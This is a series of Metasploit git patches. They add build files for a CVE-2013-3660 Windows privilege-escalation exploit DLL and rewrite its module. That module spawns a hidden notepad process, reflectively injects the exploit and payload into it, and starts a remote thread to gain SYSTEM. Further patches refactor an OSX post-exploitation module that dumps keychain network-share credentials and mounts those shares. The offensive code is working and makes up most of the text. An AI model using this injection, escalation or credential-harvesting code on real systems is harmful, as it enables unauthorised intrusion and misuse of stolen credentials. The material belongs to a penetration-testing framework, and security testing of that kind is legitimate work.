+  <ImportGroup Label="ExtensionSettings">
+    <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup>
+    <_ProjectFileVersion>10.0.30319.1</_ProjectFileVersion>
+    <OutDir>$(Configuration)\$(Platform)\</OutDir>
+    <IntDir>$(Configuration)\$(Platform)\</IntDir>
+    <LinkIncremental>false</LinkIncremental>
+    <GenerateManifest>false</GenerateManifest>
+    <CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
+    <CodeAnalysisRules />
+    <CodeAnalysisRuleAssemblies />
+    <TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <Optimization>Disabled</Optimization>
+      <AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;PPR_FLATTEN_REC_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <MinimalRebuild>true</MinimalRebuild>
+      <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
+      <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+    </ClCompile>
+    <Link>
+      <AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
+      <AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
+      <DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <SubSystem>Windows</SubSystem>
+      <TargetMachine>MachineX86</TargetMachine>
+      <ModuleDefinitionFile>
+      </ModuleDefinitionFile>
+      <AdditionalOptions>/ignore:4070</AdditionalOptions>
+    </Link>
+    <PostBuildEvent>
+      <Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL</Command>
+    </PostBuildEvent>
+    <ResourceCompile>
+      <PreprocessorDefinitions>_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+    </ResourceCompile>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <Optimization>MinSpace</Optimization>
+      <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
+      <IntrinsicFunctions>false</IntrinsicFunctions>
+      <AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;PPR_FLATTEN_REC_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <StringPooling>true</StringPooling>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <FunctionLevelLinking>false</FunctionLevelLinking>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
+      <ObjectFileName>$(OutDir)\</ObjectFileName>
+      <ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
+      <WarningLevel>Level3</WarningLevel>
+      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
+      <BufferSecurityCheck>false</BufferSecurityCheck>
+      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
+    </ClCompile>
+    <Link>
+      <AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
+      <AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
+      <IgnoreAllDefaultLibraries>false</IgnoreAllDefaultLibraries>
+      <IgnoreSpecificDefaultLibraries>%(IgnoreSpecificDefaultLibraries)</IgnoreSpecificDefaultLibraries>
+      <DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
+      <GenerateDebugInformation>false</GenerateDebugInformation>
+      <GenerateMapFile>true</GenerateMapFile>
+      <MapFileName>$(OutDir)\ppr_flatten_rec.map</MapFileName>
+      <SubSystem>Windows</SubSystem>
+      <OptimizeReferences>
+      </OptimizeReferences>
+      <EnableCOMDATFolding>
+      </EnableCOMDATFolding>
+      <RandomizedBaseAddress>false</RandomizedBaseAddress>
+      <DataExecutionPrevention>
+      </DataExecutionPrevention>
+      <ImportLibrary>$(OutDir)\ppr_flatten_rec.lib</ImportLibrary>
+      <TargetMachine>MachineX86</TargetMachine>
+      <Profile>false</Profile>
+      <ModuleDefinitionFile>
+      </ModuleDefinitionFile>
+      <AdditionalOptions>/ignore:4070</AdditionalOptions>
+    </Link>
+    <PostBuildEvent>
+      <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
+IF EXIST "..\..\..\..\..\data\exploits\CVE-2013-3660\" GOTO COPY
+    mkdir "..\..\..\..\..\data\exploits\CVE-2013-3660\"
+:COPY
+copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2013-3660\"</Command>
+    </PostBuildEvent>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClCompile Include="ppr_flatten_rec.c" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="ComplexPath.h" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+    <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
+  </ImportGroup>
+</Project>
\ No newline at end of file
diff --git a/external/source/exploits/cve-2013-3660/ppr_flatten_rec/ppr_flatten_rec.vcxproj.filters b/external/source/exploits/cve-2013-3660/ppr_flatten_rec/ppr_flatten_rec.vcxproj.filters
new file mode 100755
index 0000000000..15ae50dd2e
--- /dev/null
+++ b/external/source/exploits/cve-2013-3660/ppr_flatten_rec/ppr_flatten_rec.vcxproj.filters
@@ -0,0 +1,9 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <ClCompile Include="ppr_flatten_rec.c" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="ComplexPath.h" />
+  </ItemGroup>
+</Project>
\ No newline at end of file
diff --git a/external/source/exploits/cve-2013-3660/rdi.sln b/external/source/exploits/cve-2013-3660/rdi.sln
deleted file mode 100755
index 0a0dde7c06..0000000000
--- a/external/source/exploits/cve-2013-3660/rdi.sln
+++ /dev/null
@@ -1,20 +0,0 @@
-
-Microsoft Visual Studio Solution File, Format Version 12.00
-# Visual C++ Express 2010
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "reflective_dll", "dll\reflective_dll.vcxproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}"
-EndProject
-Global
-	GlobalSection(SolutionConfigurationPlatforms) = preSolution
-		Debug|Win32 = Debug|Win32
-		Release|Win32 = Release|Win32
-	EndGlobalSection
-	GlobalSection(ProjectConfigurationPlatforms) = postSolution
-		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Release|Win32
-		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.Build.0 = Release|Win32
-		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|Win32
-		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.Build.0 = Release|Win32
-	EndGlobalSection
-	GlobalSection(SolutionProperties) = preSolution
-		HideSolutionNode = FALSE
-	EndGlobalSection
-EndGlobal
diff --git a/external/source/exploits/make.bat b/external/source/exploits/make.bat
index 2acf81084f..808969ad80 100755
--- a/external/source/exploits/make.bat
+++ b/external/source/exploits/make.bat
@@ -26,6 +26,13 @@ PUSHD CVE-2010-0232
 msbuild.exe make.msbuild /target:%PLAT%
 POPD
 
+IF "%ERRORLEVEL%"=="0" (
+  ECHO "Building CVE-2013-3660 (ppr_flatten_rec)"
+  PUSHD CVE-2013-3660
+  msbuild.exe make.msbuild /target:%PLAT%
+  POPD
+)
+
 FOR /F "usebackq tokens=1,2 delims==" %%i IN (`wmic os get LocalDateTime /VALUE 2^>NUL`) DO IF '.%%i.'=='.LocalDateTime.' SET LDT=%%j
 SET LDT=%LDT:~0,4%-%LDT:~4,2%-%LDT:~6,2% %LDT:~8,2%:%LDT:~10,2%:%LDT:~12,6%
 echo Finished %ldt%
diff --git a/modules/exploits/windows/local/ppr_flatten_rec.rb b/modules/exploits/windows/local/ppr_flatten_rec.rb
index 47bc4c96da..41a33cc523 100644
--- a/modules/exploits/windows/local/ppr_flatten_rec.rb
+++ b/modules/exploits/windows/local/ppr_flatten_rec.rb
@@ -27,11 +27,12 @@ class Metasploit3 < Msf::Exploit::Local
         [
           'Tavis Ormandy <taviso[at]cmpxchg8b.com>', # Vulnerability discovery and Original Exploit
           'progmboy <programmeboy[at]gmail.com>',    # Original Exploit
-          'Keebie4e',    # Metasploit integration
-          'egypt',       # Metasploit integration
-          'sinn3r',      # Metasploit integration
-          'Meatballs',   # Metasploit integration
-          'juan vazquez' # Metasploit integration
+          'Keebie4e',     # Metasploit integration
+          'egypt',        # Metasploit integration
+          'sinn3r',       # Metasploit integration
+          'Meatballs',    # Metasploit integration
+          'juan vazquez', # Metasploit integration
+          'OJ Reeves'     # Metasploit integration
         ],
       'Arch'           => ARCH_X86,
       'Platform'       => 'win',
@@ -54,12 +55,17 @@ class Metasploit3 < Msf::Exploit::Local
           [ 'CVE', '2013-3660' ],
           [ 'EDB', '25912' ],
           [ 'OSVDB', '93539' ],
+          [ 'MSB', 'MS13-015' ],
           [ 'URL', 'http://seclists.org/fulldisclosure/2013/May/91' ],
         ],
       'DisclosureDate' => 'May 15 2013',
       'DefaultTarget'  => 0
     }))
 
+    register_options([
+      OptInt.new('WAIT', [ true, "Number of seconds to wait for exploit to run", 10 ])
+    ], self.class)
+
   end
 
   def check
@@ -110,6 +116,13 @@ class Metasploit3 < Msf::Exploit::Local
   end
 
   def exploit
+    if is_system?
+      fail_with(Exploit::Failure::None, 'Session is already elevated')
+    end
+
+    if check == Exploit::CheckCode::Safe
+      fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.")
+    end
 
     if sysinfo["Architecture"] =~ /wow64/i
       fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
@@ -117,56 +130,59 @@ class Metasploit3 < Msf::Exploit::Local
       fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
     end
 
-    print_status("Creating a new process and migrating...")
+    dll = ''
+    offset = nil
 
-    cmd = "#{expand_path("%windir%")}\\System32\\notepad.exe"
-    new_proc = session.sys.process.execute(cmd, nil, {'Hidden' => true })
-    new_pid = new_proc.pid
+    print_status("Launching notepad to host the exploit...")
+    cmd = "notepad.exe"
+    opts = {'Hidden' => true}
+    process = client.sys.process.execute(cmd, nil, opts)
+    pid = process.pid
+    host_process = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
+    print_good("Process #{pid} launched.")
 
-    if not new_pid
-      print_error("Filed to create the new process, trying in the current one, if unsuccessful migrate by yourself")
-    else
-      print_status("Migrating to #{new_pid}")
-      migrate_res = false
-
-      begin
-        migrate_res = session.core.migrate(new_pid)
-      rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError
-        migrate_res = false
-      end
-
-      if migrate_res
-        print_good("Successfully migrated to process #{new_pid}")
-      else
-        print_warning("Unable to migrate to process #{new_pid.to_s}, trying current #{session.sys.process.getpid} instead. If still unsuccessful, please migrate manually")
+    print_status("Reflectively injecting the exploit DLL into #{pid}...")
+    library_path = ::File.join(Msf::Config.data_directory, "exploits",
+                               "cve-2013-3660", "ppr_flatten_rec.x86.dll")
+    library_path = ::File.expand_path(library_path)
+    ::File.open(library_path, 'rb') { |f| dll = f.read }
+    pe = Rex::PeParsey::Pe.new(Rex::ImageSource::Memory.new(dll))
+    pe.exports.entries.each do |e|
+      if e.name =~ /^\S*ReflectiveLoader\S*/
+        offset = pe.rva_to_file_offset(e.rva)
+        break
       end
     end
+    # Inject the exloit, but don't run it yet.
+    exploit_mem = inject_into_pid(dll, host_process)
 
-    print_status("Trying to load the exploit and executing...")
+    print_status("Exploit injected. Injecting payload into #{pid}...")
+    # Inject the payload into the process so that it's runnable by the exploit.
+    payload_mem = inject_into_pid(payload.encoded, host_process)
 
-    session.core.load_library({
-      "LibraryFilePath" => File.join(Msf::Config.data_directory, "exploits", "cve-2013-3660", "exploit.dll"),
-      "UploadLibrary"   => true,
-      "Extension"       => false,
-      "TargetFilePath"  => "#{rand_text_alpha(5 + rand(3))}.dll",
-      "SaveToDisk"      => false
-    })
-
-    print_status("Checking privileges after exploitation...")
-
-    if is_system?
-      print_good("Exploitation successful!")
-    else
-      fail_with(Failure::Unknown, "The exploitation wasn't successful but should be safe to try again")
-    end
-
-    if execute_shellcode(payload.encoded)
-      print_good("Enjoy!")
-    else
-      fail_with(Failure::Unknown, "Error while executing the payload")
-    end
+    print_status("Payload injected. Executing exploit...")
+    # invoke the exploit, passing in the address of the payload that
+    # we want invoked on successful exploitation.
+    host_process.thread.create(exploit_mem + offset, payload_mem)
 
+    wait = datastore['WAIT'].to_i
+    print_status("Exploit thread executing (can take a while to run), waiting #{wait} sec ...")
+    # TODO: talk to the guys about this, there has to be a wait involved before the
+    # exploit has finished, because the listener has to stick around for a while
+    # otherwise it shuts down before the exploit has finished.
+    Rex.sleep(wait)
+    print_good("Exploit finished, wait for (hopefully privileged) payload execution to complete.")
   end
 
+protected
+
+  def inject_into_pid(payload, process)
+    payload_size = payload.length
+    payload_size += 1024 - (payload.length % 1024) unless payload.length % 1024 == 0
+    payload_mem = process.memory.allocate(payload_size)
+    process.memory.protect(payload_mem)
+    process.memory.write(payload_mem, payload)
+    return payload_mem
+  end
 
 end

From 485e38ebca5be6574b90f3030193a80223de5cf2 Mon Sep 17 00:00:00 2001
From: joev <joev@metasploit.com>
Date: Wed, 27 Nov 2013 05:22:12 -0600
Subject: [PATCH 111/217] Some code tweaks to post/osx/mount_share.

* Make PROTOCOL an Enum
* Move path override options to advanced section
* More Enumerable rework
* Move one-off regexes back to inline, pull out protocol list
---
 modules/post/osx/manage/mount_share.rb | 106 +++++++++++--------------
 1 file changed, 46 insertions(+), 60 deletions(-)

diff --git a/modules/post/osx/manage/mount_share.rb b/modules/post/osx/manage/mount_share.rb
index 99b5e9d6b2..d7b3543059 100644
--- a/modules/post/osx/manage/mount_share.rb
+++ b/modules/post/osx/manage/mount_share.rb
@@ -8,10 +8,9 @@ require 'rex'
 
 class Metasploit3 < Msf::Post
 
-  include Msf::Post::File
+  FILE_SHARE_PROTOCOLS = %w(smb nfs cifs ftp afp)
 
-  REGEX_PROTO = "^.*\=\"(.*)\w*\"\w*$"
-  REGEX_SERVER = "^.*\=\"(.*)\"\w*$"
+  include Msf::Post::File
 
   def initialize(info={})
     super( update_info( info,
@@ -27,8 +26,8 @@ class Metasploit3 < Msf::Post
         'Platform'      => [ 'osx' ],
         'SessionTypes'  => [ 'shell', 'meterpreter' ],
         'Actions'       => [
-          [ 'LIST',     { 'Description' => 'Show a list of stored network share credentials' } ],
-          [ 'MOUNT', { 'Description' => 'Mount a network shared volume using stored credentials' } ],
+          [ 'LIST',    { 'Description' => 'Show a list of stored network share credentials' } ],
+          [ 'MOUNT',   { 'Description' => 'Mount a network shared volume using stored credentials' } ],
           [ 'UNMOUNT', { 'Description' => 'Unmount a mounted volume' } ]
         ],
         'DefaultAction' => 'LIST'
@@ -37,22 +36,26 @@ class Metasploit3 < Msf::Post
     register_options(
       [
         OptString.new('VOLUME', [true, 'Name of network share volume. `set ACTION LIST` to get a list.', 'localhost']),
+        OptEnum.new('PROTOCOL', [true, 'Network share protocol.', 'smb', FILE_SHARE_PROTOCOLS])
+      ], self.class)
+
+    register_advanced_options(
+      [
         OptString.new('SECURITY_PATH', [true, 'Path to the security executable.', '/usr/bin/security']),
         OptString.new('OSASCRIPT_PATH', [true, 'Path to the osascript executable.', '/usr/bin/osascript']),
         OptString.new('SIDEBAR_PLIST_PATH', [true, 'Path to the finder sidebar plist.', '~/Library/Preferences/com.apple.sidebarlists.plist']),
-        OptString.new('RECENT_PLIST_PATH', [true, 'Path to the finder recent plist.', '~/Library/Preferences/com.apple.recentitems.plist']),
-        OptString.new('PROTOCOL', [true, 'Network share protocol. `set ACTION LIST` to get a list.', 'smb'])
-      ], self.class)
-
+        OptString.new('RECENT_PLIST_PATH', [true, 'Path to the finder recent plist.', '~/Library/Preferences/com.apple.recentitems.plist'])
+      ]
+    )
   end
 
   def run
     fail_with("Invalid action") if action.nil?
 
-    username = cmd_exec('whoami')
-    security_path = datastore['SECURITY_PATH'].shellescape
-    sidebar_plist_path = datastore['SIDEBAR_PLIST_PATH'].gsub(/^\~/, "/Users/#{username}").shellescape
-    recent_plist_path = datastore['RECENT_PLIST_PATH'].gsub(/^\~/, "/Users/#{username}").shellescape
+    username = cmd_exec('whoami').strip
+    security_path = datastore['SECURITY_PATH']
+    sidebar_plist_path = datastore['SIDEBAR_PLIST_PATH'].gsub(/^\~/, "/Users/#{username}")
+    recent_plist_path = datastore['RECENT_PLIST_PATH'].gsub(/^\~/, "/Users/#{username}")
 
     if action.name == 'LIST'
       if file?(security_path)
@@ -112,104 +115,87 @@ class Metasploit3 < Msf::Post
   end
 
   def get_keyring_shares(security_path)
-    vprint_status("#{security_path} dump")
-    data = cmd_exec("#{security_path} dump")
+    data = cmd_exec("#{security_path.shellescape} dump")
+
     # Grep for desc srvr and ptcl
-    tmp = []
     lines = data.lines.select { |line| line =~ /desc|srvr|ptcl/ }.map(&:strip)
 
     # Go through the list, find the saved Network Password descriptions
     # and their corresponding ptcl and srvr attributes
     list = []
-    for x in 0..lines.length-1
-      if lines[x] =~ /"desc"<blob>="Network Password"/ && x < lines.length-3
+    # for x in 0..lines.length-1
+    lines.each_with_index do |line, x|
+      if line =~ /"desc"<blob>="Network Password"/ && x < lines.length-3
         # Remove everything up to the double-quote after the equal sign,
         # and also the trailing double-quote
-        if lines[x+1].match(REGEX_PROTO)
+        if lines[x+1].match "^.*\=\"(.*)\w*\"\w*$"
           protocol = $1
-          if protocol =~ /smb|nfs|cifs|ftp|afp/ && lines[x+2].match(REGEX_SERVER)
+          if protocol.start_with?(*FILE_SHARE_PROTOCOLS) && lines[x+2].match("^.*\=\"(.*)\"\w*$")
             server = $1
             list.push(protocol + "\t" + server)
           end
         end
       end
     end
-    return list.sort
+    list.sort
   end
 
   def get_favorite_shares(sidebar_plist_path)
-    vprint_status("defaults read #{sidebar_plist_path} favoriteservers")
-    data = cmd_exec("defaults read #{sidebar_plist_path} favoriteservers")
+    data = cmd_exec("defaults read #{sidebar_plist_path.shellescape} favoriteservers")
 
     # Grep for URL
-    list = []
-    lines = data.lines
-    lines.each do |line|
-      line.strip!
-      if line =~ /^URL = \"(.*)\"\;$/
-        list.push($1)
-      end
-    end
+    list = data.lines.map(&:strip).map { |line| line =~ /^URL = \"(.*)\"\;$/; $1 }.compact
+    data = cmd_exec("defaults read #{sidebar_plist_path.shellescape} favorites")
 
-    vprint_status("defaults read #{sidebar_plist_path} favorites")
-    data = cmd_exec("defaults read #{sidebar_plist_path} favorites")
     # Grep for EntryType and Name
-    tmp = []
-    lines = data.lines
-    lines.each do |line|
-      line.strip!
-      if line =~ /EntryType|Name/
-        tmp.push(line)
-      end
-    end
-
+    lines = data.lines.map(&:strip).select { |line| line =~ /EntryType|Name/ }
     # Go through the list, find the rows with EntryType 8 and their
     # corresponding name
-    for x in 0..tmp.length-1
-      if tmp[x] =~ /EntryType = 8;/ && x < tmp.length-2
-        if tmp[x+1] =~ /^Name \= \"(.*)\"\;$/
+    for x in 0..lines.length-1
+      if lines[x] =~ /EntryType = 8;/ && x < lines.length-2
+        if lines[x+1] =~ /^Name \= \"(.*)\"\;$/
           name = $1
           list.push(name) unless list.include?(name)
-        elsif tmp[x+1] =~ /^Name \= (.*)\;$/
+        elsif lines[x+1] =~ /^Name \= (.*)\;$/
           name = $1
           list.push(name) unless list.include?(name)
         end
       end
     end
+
     return list.sort
   end
 
   def get_recent_shares(recent_plist_path)
-    vprint_status("defaults read #{recent_plist_path} RecentServers")
-    data = cmd_exec("defaults read #{recent_plist_path} RecentServers")
-
+    data = cmd_exec("defaults read #{recent_plist_path.shellescape} RecentServers")
     # Grep for Name
     regexes = [ /^Name = \"(.*)\"\;$/, /^Name = (.*)\;$/ ]
-    list = data.lines.select{ |line| if regexes.any?{ |r| line.strip! =~ r } then $1 end  }.compact.uniq.map(&:strip)
-    return list
+    data.lines.select{ |line| if regexes.any? { |r| line.strip! =~ r } then $1 end }.compact.uniq.map(&:strip)
   end
 
   def get_mounted_volumes
-    vprint_status("ls /Volumes")
     data = cmd_exec("ls /Volumes")
-    list = data.lines.map(&:strip).sort
-    return list
+    data.lines.map(&:strip).sort
   end
 
   def mount
     share_name = datastore['VOLUME']
     protocol = datastore['PROTOCOL']
     print_status("Connecting to #{protocol}://#{share_name}")
-    cmd = "osascript -e 'tell app \"finder\" to mount volume \"#{protocol}://#{share_name}\"'"
-    vprint_status(cmd)
-    cmd_exec(cmd)
+    cmd_exec("#{osascript_path.shellescape} -e 'tell app \"finder\" to mount volume \"#{protocol}://#{share_name}\"'")
   end
 
   def unmount
     share_name = datastore['VOLUME']
     print_status("Disconnecting from #{share_name}")
-    cmd = "osascript -e 'tell app \"finder\" to eject \"#{share_name}\"'"
-    vprint_status(cmd)
-    cmd_exec(cmd)
+    cmd_exec("#{osascript_path.shellescape} -e 'tell app \"finder\" to eject \"#{share_name}\"'")
   end
+
+  def cmd_exec(cmd)
+    vprint_status(cmd)
+    super
+  end
+
+  # path to osascript on the remote system
+  def osascript_path; datastore['OSASCRIPT_PATH']; end
 end

From e876155e1ac7a41ee2b4aa8d8939298bcbf84993 Mon Sep 17 00:00:00 2001
From: joev <joev@metasploit.com>
Date: Wed, 27 Nov 2013 05:45:46 -0600
Subject: [PATCH 112/217] More tweaks to mount_share.

* Adds some docs to some of the methods to further distinguish
the separate sets of shares.
---
 modules/post/osx/manage/mount_share.rb | 48 ++++++++++++++------------
 1 file changed, 25 insertions(+), 23 deletions(-)

diff --git a/modules/post/osx/manage/mount_share.rb b/modules/post/osx/manage/mount_share.rb
index d7b3543059..a52cce360a 100644
--- a/modules/post/osx/manage/mount_share.rb
+++ b/modules/post/osx/manage/mount_share.rb
@@ -10,6 +10,8 @@ class Metasploit3 < Msf::Post
 
   FILE_SHARE_PROTOCOLS = %w(smb nfs cifs ftp afp)
 
+  NAME_REGEXES = [/^Name \= \"(.*)\"\;$/, /^Name \= (.*)\;$/]
+
   include Msf::Post::File
 
   def initialize(info={})
@@ -50,8 +52,6 @@ class Metasploit3 < Msf::Post
   end
 
   def run
-    fail_with("Invalid action") if action.nil?
-
     username = cmd_exec('whoami').strip
     security_path = datastore['SECURITY_PATH']
     sidebar_plist_path = datastore['SIDEBAR_PLIST_PATH'].gsub(/^\~/, "/Users/#{username}")
@@ -114,18 +114,19 @@ class Metasploit3 < Msf::Post
     end
   end
 
+  # Returns the network shares stored in the user's keychain. These shares will often have
+  # creds attached, so mounting occurs without prompting the user for a password.
+  # @return [Array<String>] sorted list of volumes stored in the user's keychain
   def get_keyring_shares(security_path)
-    data = cmd_exec("#{security_path.shellescape} dump")
-
     # Grep for desc srvr and ptcl
+    data = cmd_exec("#{security_path.shellescape} dump")
     lines = data.lines.select { |line| line =~ /desc|srvr|ptcl/ }.map(&:strip)
 
     # Go through the list, find the saved Network Password descriptions
     # and their corresponding ptcl and srvr attributes
     list = []
-    # for x in 0..lines.length-1
     lines.each_with_index do |line, x|
-      if line =~ /"desc"<blob>="Network Password"/ && x < lines.length-3
+      if line =~ /"desc"<blob>="Network Password"/ && x < lines.length-2
         # Remove everything up to the double-quote after the equal sign,
         # and also the trailing double-quote
         if lines[x+1].match "^.*\=\"(.*)\w*\"\w*$"
@@ -140,42 +141,42 @@ class Metasploit3 < Msf::Post
     list.sort
   end
 
+  # Returns the user's "Favorite Shares". To add a Favorite Share on OSX, press cmd-k in Finder, enter
+  # an address, then click the [+] button next to the address field.
+  # @return [Array<String>] sorted list of volumes saved in the user's "Recent Shares"
   def get_favorite_shares(sidebar_plist_path)
-    data = cmd_exec("defaults read #{sidebar_plist_path.shellescape} favoriteservers")
-
     # Grep for URL
+    data = cmd_exec("defaults read #{sidebar_plist_path.shellescape} favoriteservers")
     list = data.lines.map(&:strip).map { |line| line =~ /^URL = \"(.*)\"\;$/; $1 }.compact
-    data = cmd_exec("defaults read #{sidebar_plist_path.shellescape} favorites")
 
     # Grep for EntryType and Name
+    data = cmd_exec("defaults read #{sidebar_plist_path.shellescape} favorites")
     lines = data.lines.map(&:strip).select { |line| line =~ /EntryType|Name/ }
+
     # Go through the list, find the rows with EntryType 8 and their
     # corresponding name
-    for x in 0..lines.length-1
-      if lines[x] =~ /EntryType = 8;/ && x < lines.length-2
-        if lines[x+1] =~ /^Name \= \"(.*)\"\;$/
-          name = $1
-          list.push(name) unless list.include?(name)
-        elsif lines[x+1] =~ /^Name \= (.*)\;$/
-          name = $1
-          list.push(name) unless list.include?(name)
+    lines.each_with_index do |line, x|
+      if line =~ /EntryType = 8;/ && x < lines.length-1
+        if NAME_REGEXES.any? { |r| lines[x+1].strip =~ r }
+          list.push($1)
         end
       end
     end
 
-    return list.sort
+    list.sort
   end
 
+  # Returns the user's "Recent Shares" list
+  # @return [Array<String>] sorted list of volumes saved in the user's "Recent Shares"
   def get_recent_shares(recent_plist_path)
-    data = cmd_exec("defaults read #{recent_plist_path.shellescape} RecentServers")
     # Grep for Name
-    regexes = [ /^Name = \"(.*)\"\;$/, /^Name = (.*)\;$/ ]
-    data.lines.select{ |line| if regexes.any? { |r| line.strip! =~ r } then $1 end }.compact.uniq.map(&:strip)
+    data = cmd_exec("defaults read #{recent_plist_path.shellescape} RecentServers")
+    data.lines.map(&:strip).select { |line| if NAME_REGEXES.any? { |r| line.strip =~ r } then $1 end }.compact.uniq.sort
   end
 
+  # @return [Array<String>] sorted list of mounted volume names
   def get_mounted_volumes
-    data = cmd_exec("ls /Volumes")
-    data.lines.map(&:strip).sort
+    cmd_exec("ls /Volumes").lines.map(&:strip).sort
   end
 
   def mount
@@ -191,6 +192,7 @@ class Metasploit3 < Msf::Post
     cmd_exec("#{osascript_path.shellescape} -e 'tell app \"finder\" to eject \"#{share_name}\"'")
   end
 
+  # hook cmd_exec to print a debug message when DEBUG=true
   def cmd_exec(cmd)
     vprint_status(cmd)
     super

From b0416b802da7fd7780a559db850382d4151adba0 Mon Sep 17 00:00:00 2001
From: joev <joev@metasploit.com>
Date: Wed, 27 Nov 2013 06:08:48 -0600
Subject: [PATCH 113/217] Change the Recent shares implementation.

* Allows us to see protocol of Recent Shares
* Parses protocol from file share URL
---
 modules/post/osx/manage/mount_share.rb | 46 ++++++++++++++++----------
 1 file changed, 29 insertions(+), 17 deletions(-)

diff --git a/modules/post/osx/manage/mount_share.rb b/modules/post/osx/manage/mount_share.rb
index a52cce360a..09391d0cfb 100644
--- a/modules/post/osx/manage/mount_share.rb
+++ b/modules/post/osx/manage/mount_share.rb
@@ -23,7 +23,8 @@ class Metasploit3 < Msf::Post
         'License'       => MSF_LICENSE,
         'Author'        =>
           [
-            'Peter Toth <globetother[at]gmail.com>'
+            'Peter Toth <globetother[at]gmail.com>',
+            'joev'
           ],
         'Platform'      => [ 'osx' ],
         'SessionTypes'  => [ 'shell', 'meterpreter' ],
@@ -53,9 +54,9 @@ class Metasploit3 < Msf::Post
 
   def run
     username = cmd_exec('whoami').strip
-    security_path = datastore['SECURITY_PATH']
-    sidebar_plist_path = datastore['SIDEBAR_PLIST_PATH'].gsub(/^\~/, "/Users/#{username}")
-    recent_plist_path = datastore['RECENT_PLIST_PATH'].gsub(/^\~/, "/Users/#{username}")
+    security_path = datastore['SECURITY_PATH'].shellescape
+    sidebar_plist_path = datastore['SIDEBAR_PLIST_PATH'].gsub(/^\~/, "/Users/#{username}").shellescape
+    recent_plist_path = datastore['RECENT_PLIST_PATH'].gsub(/^\~/, "/Users/#{username}").shellescape
 
     if action.name == 'LIST'
       if file?(security_path)
@@ -78,8 +79,9 @@ class Metasploit3 < Msf::Post
           print_status("No favorite shares were found")
         else
           print_status("Favorite shares (without stored credentials):")
+          print_status("  Protocol\tShare Name")
           favorite_shares.each do |line|
-            print_good("  #{line}")
+            print_uri(line)
           end
         end
       else
@@ -91,8 +93,9 @@ class Metasploit3 < Msf::Post
           print_status("No recent shares were found")
         else
           print_status("Recent shares (without stored credentials):")
+          print_status("  Protocol\tShare Name")
           recent_shares.each do |line|
-            print_good("  #{line}")
+            print_uri(line)
           end
         end
       else
@@ -119,7 +122,7 @@ class Metasploit3 < Msf::Post
   # @return [Array<String>] sorted list of volumes stored in the user's keychain
   def get_keyring_shares(security_path)
     # Grep for desc srvr and ptcl
-    data = cmd_exec("#{security_path.shellescape} dump")
+    data = cmd_exec("#{security_path} dump")
